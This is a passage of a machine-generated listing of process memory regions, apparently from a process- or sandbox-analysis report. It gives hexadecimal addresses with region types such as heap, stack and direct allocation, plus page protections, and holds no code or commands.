page read and write
1E893B3F000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E89354B000
heap
page read and write
169170D8000
heap
page read and write
1E893573000
heap
page read and write
1E893C41000
heap
page read and write
1E89356F000
heap
page read and write
20FCB1D0000
heap
page read and write
1E895D60000
direct allocation
page read and write
24BCD652000
heap
page read and write
1E893629000
heap
page read and write
1E894BCF000
heap
page read and write
1E8933D1000
heap
page read and write
1E893C2B000
heap
page read and write
1E893629000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E895D60000
direct allocation
page read and write
1E893A5C000
heap
page read and write
7FF7333BD000
unkown
page readonly
1E893B67000
heap
page read and write
1E891515000
heap
page read and write
1E893546000
heap
page read and write
1E8933C3000
heap
page read and write
1E8933CC000
heap
page read and write
1E777B40000
heap
page read and write
1E8935AA000
heap
page read and write
235FD640000
heap
page read and write
1E894C91000
heap
page read and write
1E893AE0000
heap
page read and write
1E893B75000
heap
page read and write
1E893BF1000
heap
page read and write
1E894A9C000
heap
page read and write
1E8949D2000
heap
page read and write
161789D5000
heap
page read and write
1E89395C000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E8947E4000
heap
page read and write
1E89361F000
heap
page read and write
1E894F70000
direct allocation
page read and write
1E894C55000
heap
page read and write
1E8939F1000
heap
page read and write
1E891539000
heap
page read and write
1E894638000
heap
page read and write
1E893B77000
heap
page read and write
1E894BD1000
heap
page read and write
1E893A4C000
heap
page read and write
1E8936DD000
heap
page read and write
1E8933E0000
heap
page read and write
1E8914EA000
heap
page read and write
1E8933D4000
heap
page read and write
1E8935AA000
heap
page read and write
16178BA0000
trusted library allocation
page read and write
1E893962000
heap
page read and write
161789F8000
heap
page read and write
161789D5000
heap
page read and write
1E893395000
heap
page read and write
1E891469000
heap
page read and write
24BCD655000
heap
page read and write
1E893C02000
heap
page read and write
1E893355000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E8939F6000
heap
page read and write
161789E8000
heap
page read and write
1E89487C000
heap
page read and write
1E894B97000
heap
page read and write
161789D5000
heap
page read and write
1E893A22000
heap
page read and write
1E89334A000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E894880000
heap
page read and write
82CD5BE000
stack
page read and write
1E89391F000
heap
page read and write
1E893556000
heap
page read and write
1E8935C8000
heap
page read and write
1E89352B000
heap
page read and write
1E89393B000
heap
page read and write
24BCD660000
heap
page read and write
1E893AE7000
heap
page read and write
1E894C82000
heap
page read and write
1E89398A000
heap
page read and write
7FF7333D0000
unkown
page read and write
161789B4000
heap
page read and write
1E893580000
heap
page read and write
1E893A01000
heap
page read and write
1E893B50000
heap
page read and write
1E8935DE000
heap
page read and write
2D0F51B9000
heap
page read and write
16919144000
heap
page read and write
1E8935C3000
heap
page read and write
1E893606000
heap
page read and write
1E893301000
heap
page read and write
7FF7333BD000
unkown
page readonly
1E893513000
heap
page read and write
169173DE000
heap
page read and write
1E8935A1000
heap
page read and write
1E893B67000
heap
page read and write
1E893B56000
heap
page read and write
2D0F51C7000
heap
page read and write
1E895D60000
direct allocation
page read and write
2D0F51ED000
heap
page read and write
3E9254D000
stack
page read and write
1A228600000
heap
page read and write
1E893B63000
heap
page read and write
79DCD4C000
stack
page read and write
1E894BDE000
heap
page read and write
169170FB000
heap
page read and write
1E894BBD000
heap
page read and write
1E8933D6000
heap
page read and write
1E893542000
heap
page read and write
1E8939B8000
heap
page read and write
1E891541000
heap
page read and write
1E894657000
heap
page read and write
7FF7333D0000
unkown
page write copy
1E893BDF000
heap
page read and write
1E893998000
heap
page read and write
1E893344000
heap
page read and write
24BCD652000
heap
page read and write
1E89361D000
heap
page read and write
1E893513000
heap
page read and write
1E89354C000
heap
page read and write
1E8933DA000
heap
page read and write
1E8933C3000
heap
page read and write
16179127000
heap
page read and write
1E89152D000
heap
page read and write
1E893B5D000
heap
page read and write
1E894631000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893693000
heap
page read and write
24BCD659000
heap
page read and write
16179117000
heap
page read and write
1E893366000
heap
page read and write
1E8936BE000
heap
page read and write
1E89351A000
heap
page read and write
48716FD000
stack
page read and write
24BCD65F000
heap
page read and write
24BCD660000
heap
page read and write
7FF7333D6000
unkown
page readonly
1E893C94000
heap
page read and write
1E8939E1000
heap
page read and write
1E894A89000
heap
page read and write
82CD3CE000
stack
page read and write
24BCD655000
heap
page read and write
1E89482B000
heap
page read and write
169178D1000
heap
page read and write
1E893362000
heap
page read and write
1E89361E000
heap
page read and write
24BCD660000
heap
page read and write
1E894B17000
heap
page read and write
96641FE000
stack
page read and write
1E893B5A000
heap
page read and write
24BCD652000
heap
page read and write
169178C8000
heap
page read and write
1E89331C000
heap
page read and write
1E8947C8000
heap
page read and write
1E89398D000
heap
page read and write
1E894B39000
heap
page read and write
1E893A47000
heap
page read and write
1E894862000
heap
page read and write
BF5915D000
stack
page read and write
1E777E80000
heap
page read and write
24BCD660000
heap
page read and write
1E893B52000
heap
page read and write
24BCD652000
heap
page read and write
1E89334C000
heap
page read and write
1E893B75000
heap
page read and write
169178AE000
heap
page read and write
1E893542000
heap
page read and write
1E8939EB000
heap
page read and write
21074690000
heap
page read and write
1E8935C3000
heap
page read and write
25621370000
heap
page read and write
24BCD652000
heap
page read and write
1E8933EE000
heap
page read and write
1E893A43000
heap
page read and write
1E893A60000
heap
page read and write
1E894BDE000
heap
page read and write
16178997000
heap
page read and write
24BCD659000
heap
page read and write
1E895D60000
direct allocation
page read and write
24BCD630000
heap
page read and write
1E893B5D000
heap
page read and write
1E891539000
heap
page read and write
1E893AFA000
heap
page read and write
1E893B5D000
heap
page read and write
1E895D60000
direct allocation
page read and write
1A04D060000
heap
page read and write
16179143000
heap
page read and write
24BCD652000
heap
page read and write
1E8935DD000
heap
page read and write
1E8936EE000
heap
page read and write
1E89357F000
heap
page read and write
1E894613000
heap
page read and write
1E8939E9000
heap
page read and write
16179149000
heap
page read and write
16178997000
heap
page read and write
24BCD65F000
heap
page read and write
1691741B000
heap
page read and write
169170F3000
heap
page read and write
E4711FE000
stack
page read and write
1E894717000
heap
page read and write
1E893378000
heap
page read and write
24277340000
heap
page read and write
1EA7FA00000
heap
page read and write
1E894D28000
heap
page read and write
1E893B5D000
heap
page read and write
1E8939C8000
heap
page read and write
29F32CB0000
heap
page read and write
1CE75680000
heap
page read and write
1E893686000
heap
page read and write
1E893B5A000
heap
page read and write
1E8914FE000
heap
page read and write
1E893BD1000
heap
page read and write
1E893984000
heap
page read and write
24BCD652000
heap
page read and write
1E893518000
heap
page read and write
1E893B5D000
heap
page read and write
1E893AE1000
heap
page read and write
1E894060000
heap
page read and write
24BCD65F000
heap
page read and write
1E893A4C000
heap
page read and write
1E8936A1000
heap
page read and write
1E893689000
heap
page read and write
24BCD652000
heap
page read and write
1E89337C000
heap
page read and write
1EA7FA32000
heap
page read and write
1E8933B2000
heap
page read and write
1E89355E000
heap
page read and write
1E894863000
heap
page read and write
1E89154C000
heap
page read and write
24BCD652000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E89335B000
heap
page read and write
1E893BC2000
heap
page read and write
1E893BF1000
heap
page read and write
1E8947F4000
heap
page read and write
1E893581000
heap
page read and write
16178FCE000
heap
page read and write
1E893B1B000
heap
page read and write
CC3F8FF000
unkown
page read and write
25621350000
heap
page read and write
1E89369A000
heap
page read and write
1E893A03000
heap
page read and write
169170F3000
heap
page read and write
1691710B000
heap
page read and write
1E893966000
heap
page read and write
1E895D60000
direct allocation
page read and write
169178C8000
heap
page read and write
29F32CEB000
heap
page read and write
1E893693000
heap
page read and write
1E892E48000
direct allocation
page read and write
1E89354E000
heap
page read and write
1E894716000
heap
page read and write
1E8936C5000
heap
page read and write
1691711F000
heap
page read and write
9C58EFC000
stack
page read and write
2D0F51D8000
heap
page read and write
169170FC000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E8939D2000
heap
page read and write
24BCD652000
heap
page read and write
1E89483A000
heap
page read and write
1E89394D000
heap
page read and write
1E893A93000
heap
page read and write
1E8939B1000
heap
page read and write
1E893369000
heap
page read and write
173007F000
stack
page read and write
1E89333D000
heap
page read and write
1E891526000
heap
page read and write
1E894CFE000
heap
page read and write
1E893549000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E895C60000
direct allocation
page read and write
169178AC000
heap
page read and write
1E893533000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E89356A000
heap
page read and write
1E894598000
heap
page read and write
1E893BBE000
heap
page read and write
1E89151E000
heap
page read and write
1E894815000
heap
page read and write
29F32F40000
heap
page read and write
1E893BF1000
heap
page read and write
1E893A07000
heap
page read and write
1E893B70000
heap
page read and write
169173D5000
heap
page read and write
16178B94000
heap
page read and write
1E894A8F000
heap
page read and write
24BCD659000
heap
page read and write
1E893AED000
heap
page read and write
1E893DF0000
direct allocation
page read and write
24BCD659000
heap
page read and write
1E8939A6000
heap
page read and write
1E893B4B000
heap
page read and write
1E8914EF000
heap
page read and write
24BCD659000
heap
page read and write
1E894B91000
heap
page read and write
96642FE000
stack
page read and write
16179124000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893502000
heap
page read and write
1E894868000
heap
page read and write
1E893629000
heap
page read and write
1E8945E2000
heap
page read and write
1E89367D000
heap
page read and write
1E89461B000
heap
page read and write
1E89150B000
heap
page read and write
1E89154C000
heap
page read and write
1E893334000
heap
page read and write
1E8936C7000
heap
page read and write
1E89366C000
heap
page read and write
1E89367A000
heap
page read and write
1E8948E2000
heap
page read and write
1E8935AA000
heap
page read and write
1E894863000
heap
page read and write
1EA7FA31000
heap
page read and write
169178BA000
heap
page read and write
1E8945C1000
heap
page read and write
1EA7F970000
heap
page read and write
1E893360000
heap
page read and write
1E8939AC000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E8935A7000
heap
page read and write
1E894677000
heap
page read and write
1E8935C7000
heap
page read and write
1E893693000
heap
page read and write
169170F3000
heap
page read and write
1E893B5A000
heap
page read and write
16179139000
heap
page read and write
1E893589000
heap
page read and write
1A04CE50000
heap
page read and write
1E8933E2000
heap
page read and write
1E894703000
heap
page read and write
1E8936B3000
heap
page read and write
1E8939F1000
heap
page read and write
1E8939E5000
heap
page read and write
1E8936C9000
heap
page read and write
1E894CBD000
heap
page read and write
1E8945E2000
heap
page read and write
1E893A0D000
heap
page read and write
1E893542000
heap
page read and write
1E894696000
heap
page read and write
1E894370000
direct allocation
page read and write
17300FF000
stack
page read and write
1E8939EB000
heap
page read and write
1E8936BC000
heap
page read and write
1E89154C000
heap
page read and write
1E894873000
heap
page read and write
1E893C2E000
heap
page read and write
1E8935B3000
heap
page read and write
1E893AE6000
heap
page read and write
1E894BC6000
heap
page read and write
1E893A00000
heap
page read and write
2D0F51CD000
heap
page read and write
16178B9A000
heap
page read and write
1E893B81000
heap
page read and write
1E894880000
heap
page read and write
1EA7FA21000
heap
page read and write
16179121000
heap
page read and write
1691710B000
heap
page read and write
1E895D60000
direct allocation
page read and write
3E924C8000
stack
page read and write
1E89367F000
heap
page read and write
1E8939F1000
heap
page read and write
1E89337A000
heap
page read and write
1E893A03000
heap
page read and write
1E8935C6000
heap
page read and write
1EA7F950000
heap
page read and write
1E893A2B000
heap
page read and write
16919156000
heap
page read and write
1E893652000
heap
page read and write
1E89368E000
heap
page read and write
1E893A0C000
heap
page read and write
1E893BFF000
heap
page read and write
1E89355A000
heap
page read and write
1E894B6D000
heap
page read and write
1E89338C000
heap
page read and write
161789D5000
heap
page read and write
1E893604000
heap
page read and write
1E893B5A000
heap
page read and write
1E894862000
heap
page read and write
1E893562000
heap
page read and write
1E89363C000
heap
page read and write
1E893B91000
heap
page read and write
1E895D60000
direct allocation
page read and write
169178B6000
heap
page read and write
1E894618000
heap
page read and write
1E8947F5000
heap
page read and write
5F4FFFF000
unkown
page read and write
1E89331D000
heap
page read and write
1E895D60000
direct allocation
page read and write
BF594FF000
stack
page read and write
1E894AB6000
heap
page read and write
1E893BD0000
heap
page read and write
1E89365A000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893BD0000
heap
page read and write
29F32F44000
heap
page read and write
1E89395B000
heap
page read and write
1E8946A8000
heap
page read and write
24277502000
heap
page read and write
1E894863000
heap
page read and write
1E893627000
heap
page read and write
2894F2F0000
heap
page read and write
1E893A04000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893546000
heap
page read and write
1E893522000
heap
page read and write
7FF733391000
unkown
page execute read
16917109000
heap
page read and write
169170B7000
heap
page read and write
1E894880000
heap
page read and write
1E893A1C000
heap
page read and write
1E895C50000
direct allocation
page read and write
24BCD652000
heap
page read and write
1E8914D0000
heap
page read and write
1E893C94000
heap
page read and write
161789B8000
heap
page read and write
1E893509000
heap
page read and write
2894F595000
heap
page read and write
16917107000
heap
page read and write
1E893905000
heap
page read and write
1E89154C000
heap
page read and write
169170F7000
heap
page read and write
25621412000
heap
page read and write
161789E3000
heap
page read and write
1E894696000
heap
page read and write
1E894C05000
heap
page read and write
1E894C3B000
heap
page read and write
1E8939AC000
heap
page read and write
1E894A49000
heap
page read and write
1E893A03000
heap
page read and write
1E8949D7000
heap
page read and write
1E8938F0000
heap
page read and write
1E894B62000
heap
page read and write
1E8935AA000
heap
page read and write
24BCD652000
heap
page read and write
1E89464B000
heap
page read and write
1E8946AC000
heap
page read and write
24BCD652000
heap
page read and write
2D0F51C7000
heap
page read and write
1E894B96000
heap
page read and write
1E89361C000
heap
page read and write
1691711F000
heap
page read and write
1E894591000
heap
page read and write
1E89358B000
heap
page read and write
1E894815000
heap
page read and write
1E893BF1000
heap
page read and write
25621402000
heap
page read and write
1E893BFF000
heap
page read and write
1E893652000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893A6C000
heap
page read and write
1E893693000
heap
page read and write
2D0F51FB000
heap
page read and write
161789DE000
heap
page read and write
1E89336E000
heap
page read and write
1E8935AA000
heap
page read and write
1E8935EF000
heap
page read and write
1E893547000
heap
page read and write
161789F2000
heap
page read and write
1E8939B0000
heap
page read and write
20BBA182000
heap
page read and write
16178FCE000
heap
page read and write
169172D0000
trusted library allocation
page read and write
161789FD000
heap
page read and write
1617A9B1000
heap
page read and write
1E893533000
heap
page read and write
24BCD652000
heap
page read and write
1E893A2C000
heap
page read and write
1E894776000
heap
page read and write
24BCD65F000
heap
page read and write
242774EB000
heap
page read and write
1E893584000
heap
page read and write
1E893AFE000
heap
page read and write
20FCAF70000
heap
page read and write
1E893349000
heap
page read and write
1E893982000
heap
page read and write
1E893BF1000
heap
page read and write
169170D6000
heap
page read and write
24BCD65F000
heap
page read and write
1E8935F2000
heap
page read and write
1E8935E5000
heap
page read and write
169170D7000
heap
page read and write
1E893699000
heap
page read and write
1E891537000
heap
page read and write
161789EC000
heap
page read and write
1E8945BA000
heap
page read and write
1E893562000
heap
page read and write
16919145000
heap
page read and write
1E893546000
heap
page read and write
1E8945FE000
heap
page read and write
1E893BF1000
heap
page read and write
1E893C02000
heap
page read and write
1E8948E3000
heap
page read and write
256214E0000
heap
page read and write
1E89332E000
heap
page read and write
24BCD660000
heap
page read and write
1E8933E2000
heap
page read and write
1E8914DC000
heap
page read and write
1E893C42000
heap
page read and write
1E8948A2000
heap
page read and write
1E893A4C000
heap
page read and write
1E89459D000
heap
page read and write
1E894D14000
heap
page read and write
1E894CD3000
heap
page read and write
1E89336B000
heap
page read and write
1E8933D3000
heap
page read and write
1E893617000
heap
page read and write
169173D4000
heap
page read and write
1E8936BC000
heap
page read and write
1E8939C3000
heap
page read and write
1E894880000
heap
page read and write
1E89369C000
heap
page read and write
1E89334D000
heap
page read and write
24BCD652000
heap
page read and write
1E89363C000
heap
page read and write
1E8945B9000
heap
page read and write
1E8932F2000
heap
page read and write
1E895D90000
direct allocation
page read and write
1E893B7A000
heap
page read and write
1E894B65000
heap
page read and write
24BCD652000
heap
page read and write
24BCD659000
heap
page read and write
7FF7333D0000
unkown
page write copy
1E894887000
heap
page read and write
1E894A05000
heap
page read and write
3E928FF000
stack
page read and write
1E893600000
heap
page read and write
1E893562000
heap
page read and write
1E8935A1000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E894D0D000
heap
page read and write
1E893378000
heap
page read and write
1E89151E000
heap
page read and write
1E8935A1000
heap
page read and write
24BCD652000
heap
page read and write
1E894880000
heap
page read and write
161789E5000
heap
page read and write
1E89336E000
heap
page read and write
1E893693000
heap
page read and write
1E893602000
heap
page read and write
1E894872000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E8936CB000
heap
page read and write
1E895C60000
direct allocation
page read and write
1E893355000
heap
page read and write
16917119000
heap
page read and write
24BCD652000
heap
page read and write
1E895D60000
direct allocation
page read and write
161789F7000
heap
page read and write
16917290000
heap
page read and write
1E894270000
direct allocation
page read and write
1E893A12000
heap
page read and write
1E8933D2000
heap
page read and write
1E893362000
heap
page read and write
1E893377000
heap
page read and write
16178BA0000
trusted library allocation
page read and write
1E894A56000
heap
page read and write
1E894CF7000
heap
page read and write
24BCD65F000
heap
page read and write
1E8933E9000
heap
page read and write
1E893B67000
heap
page read and write
1E894703000
heap
page read and write
1E893301000
heap
page read and write
7FF7333D6000
unkown
page readonly
1E894638000
heap
page read and write
1E893B67000
heap
page read and write
1E893CE8000
heap
page read and write
161789C7000
heap
page read and write
1E894609000
heap
page read and write
1E893A07000
heap
page read and write
1E8936C6000
heap
page read and write
1E893CEC000
heap
page read and write
1E8933D8000
heap
page read and write
1617A9B2000
heap
page read and write
1E894170000
direct allocation
page read and write
16917113000
heap
page read and write
1E893AE1000
heap
page read and write
1E893359000
heap
page read and write
1E893377000
heap
page read and write
1E893515000
heap
page read and write
169170FF000
heap
page read and write
169173DA000
heap
page read and write
169178D3000
heap
page read and write
1B13AFD000
stack
page read and write
1E8933D9000
heap
page read and write
48717FF000
stack
page read and write
1E8933C4000
heap
page read and write
1E89390D000
heap
page read and write
1617A9C4000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893AED000
heap
page read and write
16178FC2000
heap
page read and write
1A228860000
heap
page read and write
1E894BC2000
heap
page read and write
1E893B70000
heap
page read and write
1EA7FA14000
heap
page read and write
16179138000
heap
page read and write
1E89363C000
heap
page read and write
1E891538000
heap
page read and write
21074990000
heap
page read and write
1E894A09000
heap
page read and write
1E893AAB000
heap
page read and write
24BCD659000
heap
page read and write
1E8945A0000
heap
page read and write
1E895D60000
direct allocation
page read and write
24277502000
heap
page read and write
1E894B69000
heap
page read and write
1EA7FA21000
heap
page read and write
1E89484F000
heap
page read and write
1E8932F5000
heap
page read and write
256213EB000
heap
page read and write
169170B2000
heap
page read and write
1E8945A0000
heap
page read and write
1E8936A5000
heap
page read and write
1E894885000
heap
page read and write
1E89361D000
heap
page read and write
1E893A1D000
heap
page read and write
161789E7000
heap
page read and write
1E893C02000
heap
page read and write
20FCB083000
heap
page read and write
1E893377000
heap
page read and write
1E895D60000
direct allocation
page read and write
235FD8F4000
heap
page read and write
1E894C46000
heap
page read and write
1E89483F000
heap
page read and write
1E8936C0000
heap
page read and write
1E89478F000
heap
page read and write
1E893376000
heap
page read and write
1E893A63000
heap
page read and write
24BCD659000
heap
page read and write
1E893C9C000
heap
page read and write
1E893633000
heap
page read and write
1E893562000
heap
page read and write
1E893698000
heap
page read and write
1E893C9C000
heap
page read and write
2D0F51F4000
heap
page read and write
1E893A03000
heap
page read and write
1E893653000
heap
page read and write
1E893B0D000
heap
page read and write
1E894A88000
heap
page read and write
1E893594000
heap
page read and write
1E893518000
heap
page read and write
A6201FF000
unkown
page read and write
16919143000
heap
page read and write
24BCD660000
heap
page read and write
1E8946F0000
heap
page read and write
169178C9000
heap
page read and write
29F32E00000
heap
page read and write
2D0F51FB000
heap
page read and write
1E893CEC000
heap
page read and write
1E895D70000
direct allocation
page read and write
1E891450000
heap
page read and write
1E893BD1000
heap
page read and write
11FD0FF000
stack
page read and write
169173DA000
heap
page read and write
1E894571000
heap
page read and write
1E894BFE000
heap
page read and write
8A8E1FE000
stack
page read and write
1E893AE1000
heap
page read and write
1E8914DC000
heap
page read and write
1E8934F0000
heap
page read and write
1E89368E000
heap
page read and write
1E894CE7000
heap
page read and write
1E89337D000
heap
page read and write
1E894A13000
heap
page read and write
1E893C49000
heap
page read and write
1E89154A000
heap
page read and write
1E893514000
heap
page read and write
1E893554000
heap
page read and write
1E894677000
heap
page read and write
1E8949DB000
heap
page read and write
1E893BFF000
heap
page read and write
1E893A4C000
heap
page read and write
1E8914D7000
heap
page read and write
1E8949E0000
heap
page read and write
1E8947BB000
heap
page read and write
1E893693000
heap
page read and write
16178FC5000
heap
page read and write
169170E6000
heap
page read and write
1E8933CD000
heap
page read and write
1E893390000
heap
page read and write
1E895C60000
direct allocation
page read and write
24BCD652000
heap
page read and write
1E5E2FC000
stack
page read and write
24BCD652000
heap
page read and write
1E8933CB000
heap
page read and write
1E893A15000
heap
page read and write
1E893519000
heap
page read and write
1E893520000
heap
page read and write
A6202FF000
stack
page read and write
1E894850000
heap
page read and write
1E893365000
heap
page read and write
1E8933E4000
heap
page read and write
169178D2000
heap
page read and write
1E89338A000
heap
page read and write
1E8946A8000
heap
page read and write
24BCD652000
heap
page read and write
1A04CF30000
heap
page read and write
1E893C9C000
heap
page read and write
7E203FF000
unkown
page read and write
1E89350B000
heap
page read and write
1E894D70000
direct allocation
page read and write
1E893969000
heap
page read and write
1E894660000
heap
page read and write
1E8935C7000
heap
page read and write
1E893583000
heap
page read and write
1E89335E000
heap
page read and write
1E893A73000
heap
page read and write
16179110000
heap
page read and write
1E8938FB000
heap
page read and write
1E8946A3000
heap
page read and write
1E8933DC000
heap
page read and write
1E894A21000
heap
page read and write
1EA7FD34000
heap
page read and write
1E893BF1000
heap
page read and write
146728B0000
heap
page read and write
1617A9C6000
heap
page read and write
1E893A07000
heap
page read and write
1E893518000
heap
page read and write
1E893C23000
heap
page read and write
1E893914000
heap
page read and write
1E894BFE000
heap
page read and write
1E8933CE000
heap
page read and write
1E893A0D000
heap
page read and write
5F4FEFC000
stack
page read and write
169178A0000
heap
page read and write
1E5E3FF000
unkown
page read and write
1E893A03000
heap
page read and write
1E8935CC000
heap
page read and write
169172D0000
trusted library allocation
page read and write
1CE75940000
heap
page read and write
1E89399A000
heap
page read and write
1E89471A000
heap
page read and write
7FF733391000
unkown
page execute read
1E894776000
heap
page read and write
1E8935A2000
heap
page read and write
24BCD65F000
heap
page read and write
1E893672000
heap
page read and write
1E89361D000
heap
page read and write
16178F80000
heap
page read and write
24BCF010000
heap
page read and write
1E893B5D000
heap
page read and write
1E8948A2000
heap
page read and write
1E893B70000
heap
page read and write
1B13BFE000
stack
page read and write
1E893BE3000
heap
page read and write
24BCD659000
heap
page read and write
16178FC4000
heap
page read and write
2D0F5170000
heap
page read and write
1E89362D000
heap
page read and write
1E8936A7000
heap
page read and write
1E893C36000
heap
page read and write
1E8914FC000
heap
page read and write
1E89334A000
heap
page read and write
9EFB1FF000
stack
page read and write
1E893AE7000
heap
page read and write
1EA7FBD0000
heap
page read and write
7FF733390000
unkown
page readonly
20FCB1C0000
heap
page read and write
1E8947EE000
heap
page read and write
1E89355E000
heap
page read and write
1E893CE7000
heap
page read and write
1E894B99000
heap
page read and write
1E893C88000
heap
page read and write
1E8935AA000
heap
page read and write
1E893CF0000
direct allocation
page read and write
161789B3000
heap
page read and write
1E89154C000
heap
page read and write
1E893562000
heap
page read and write
1E893ADF000
heap
page read and write
1E894790000
heap
page read and write
1E893A31000
heap
page read and write
1E893C12000
heap
page read and write
161789F1000
heap
page read and write
1E8933DE000
heap
page read and write
1E8947E9000
heap
page read and write
1E893B5A000
heap
page read and write
1E893662000
heap
page read and write
24BCD659000
heap
page read and write
1E89362A000
heap
page read and write
1E893376000
heap
page read and write
1E893379000
heap
page read and write
1E8914E5000
heap
page read and write
1E8936A6000
heap
page read and write
1E893A63000
heap
page read and write
1E8939F7000
heap
page read and write
1E895D60000
direct allocation
page read and write
24BCD660000
heap
page read and write
1E89365E000
heap
page read and write
1E893542000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E895D60000
direct allocation
page read and write
1E895D60000
direct allocation
page read and write
1E8936D6000
heap
page read and write
16919155000
heap
page read and write
1E893301000
heap
page read and write
1617A9B0000
heap
page read and write
1E893CDF000
heap
page read and write
24BCD65F000
heap
page read and write
1E893591000
heap
page read and write
24BCEFB0000
heap
page read and write
1E895170000
direct allocation
page read and write
1E893509000
heap
page read and write
1E891537000
heap
page read and write
1E893698000
heap
page read and write
169170FA000
heap
page read and write
1E893A72000
heap
page read and write
161789ED000
heap
page read and write
1E8933DB000
heap
page read and write
24BCD652000
heap
page read and write
1E8939FD000
heap
page read and write
1E893BE6000
heap
page read and write
24BCD65F000
heap
page read and write
1E893A32000
heap
page read and write
1E8914FA000
heap
page read and write
14672CA5000
heap
page read and write
1E893652000
heap
page read and write
1E893B67000
heap
page read and write
1E8935D2000
heap
page read and write
1E89397C000
heap
page read and write
1691711F000
heap
page read and write
1E893968000
heap
page read and write
172FE77000
stack
page read and write
1E893BFF000
heap
page read and write
24BCD652000
heap
page read and write
1E8945C1000
heap
page read and write
1E89398C000
heap
page read and write
1E893BC2000
heap
page read and write
1E8938F2000
heap
page read and write
1E893C72000
heap
page read and write
1E893698000
heap
page read and write
1E8948A2000
heap
page read and write
1E894A1A000
heap
page read and write
20BBA172000
heap
page read and write
1E894470000
direct allocation
page read and write
1617911C000
heap
page read and write
1E894B5A000
heap
page read and write
1E893A11000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E894657000
heap
page read and write
1E8935FF000
heap
page read and write
1E893A14000
heap
page read and write
1E893A14000
heap
page read and write
24BCD652000
heap
page read and write
1E893536000
heap
page read and write
1E8935E6000
heap
page read and write
24BCD65F000
heap
page read and write
1E893A9A000
heap
page read and write
1E89356A000
heap
page read and write
24BCD660000
heap
page read and write
1E893698000
heap
page read and write
1E8939B2000
heap
page read and write
1E893BF1000
heap
page read and write
1E894A53000
heap
page read and write
169170AF000
heap
page read and write
1E89333E000
heap
page read and write
1E8949CD000
heap
page read and write
1E8935EA000
heap
page read and write
1E893C00000
heap
page read and write
1E893BAF000
heap
page read and write
1E893CEC000
heap
page read and write
1E89399A000
heap
page read and write
1E893591000
heap
page read and write
1E894637000
heap
page read and write
24BCD657000
heap
page read and write
1CE755D0000
heap
page read and write
1E895C50000
direct allocation
page read and write
1E894D19000
heap
page read and write
1E89334A000
heap
page read and write
169173DE000
heap
page read and write
16917118000
heap
page read and write
1E893B3A000
heap
page read and write
1E8935C7000
heap
page read and write
1E893CE6000
heap
page read and write
1E893339000
heap
page read and write
1E893379000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E89333F000
heap
page read and write
1CE755F0000
heap
page read and write
1E8933DB000
heap
page read and write
1E893B5D000
heap
page read and write
1E89471A000
heap
page read and write
1E893A42000
heap
page read and write
1E89365F000
heap
page read and write
24BCD65F000
heap
page read and write
1E893389000
heap
page read and write
1E8932F8000
heap
page read and write
1E8935A1000
heap
page read and write
1E89355E000
heap
page read and write
A6200FD000
stack
page read and write
1E8939F1000
heap
page read and write
1E89154C000
heap
page read and write
1E89332F000
heap
page read and write
1A04CF60000
heap
page read and write
1E895D60000
direct allocation
page read and write
24BCD652000
heap
page read and write
1E893A73000
heap
page read and write
1E8939EF000
heap
page read and write
1E89480A000
heap
page read and write
1E894643000
heap
page read and write
1E893693000
heap
page read and write
11FCEFD000
stack
page read and write
1E893BBA000
heap
page read and write
16178BA0000
trusted library allocation
page read and write
1E893B79000
heap
page read and write
1E894A90000
heap
page read and write
161789E8000
heap
page read and write
1E8935CA000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893EF0000
direct allocation
page read and write
1E89399A000
heap
page read and write
1E8936B7000
heap
page read and write
1E894B4B000
heap
page read and write
1E8938F3000
heap
page read and write
1E893A43000
heap
page read and write
1E89398C000
heap
page read and write
1E893377000
heap
page read and write
1E894696000
heap
page read and write
1E8949E5000
heap
page read and write
1A04D0E4000
heap
page read and write
1E8939CF000
heap
page read and write
16178B50000
heap
page read and write
1E893C26000
heap
page read and write
1E894727000
heap
page read and write
2894F590000
heap
page read and write
1E893582000
heap
page read and write
1E893AAF000
heap
page read and write
1E89367F000
heap
page read and write
1E89356F000
heap
page read and write
1E894790000
heap
page read and write
2894F220000
heap
page read and write
1E893B70000
heap
page read and write
29F32BD0000
heap
page read and write
1E893B0D000
heap
page read and write
1E8939D7000
heap
page read and write
1E893301000
heap
page read and write
1E89334A000
heap
page read and write
1E8936BA000
heap
page read and write
1E8949E5000
heap
page read and write
242774FA000
heap
page read and write
1E8946EE000
heap
page read and write
1E893A9C000
heap
page read and write
1E894A80000
heap
page read and write
1E8945FA000
heap
page read and write
1E8947E5000
heap
page read and write
1E89484B000
heap
page read and write
1E891537000
heap
page read and write
1E893514000
heap
page read and write
136CCAD0000
heap
page read and write
1E893536000
heap
page read and write
1E8933D0000
heap
page read and write
1E8945F6000
heap
page read and write
1E894BC2000
heap
page read and write
24BCD655000
heap
page read and write
1E89356F000
heap
page read and write
1E893A5D000
heap
page read and write
1E89472A000
heap
page read and write
1E893504000
heap
page read and write
1691711F000
heap
page read and write
1E8935AA000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E893CEC000
heap
page read and write
79DD0FF000
unkown
page read and write
1E893B67000
heap
page read and write
1E893944000
heap
page read and write
1E893C2A000
heap
page read and write
1E89333F000
heap
page read and write
169178A7000
heap
page read and write
1E893327000
heap
page read and write
1E893562000
heap
page read and write
1E895D60000
direct allocation
page read and write
1E8933DB000
heap
page read and write
1E8932F6000
heap
page read and write
1E893B5D000
heap
page read and write
1E893346000
heap
page read and write
E47107E000
stack
page read and write
1E894846000
heap
page read and write
8A8E0FD000
stack
page read and write
16179144000
heap
page read and write
1E8914D9000
heap
page read and write
1E894BFE000
heap
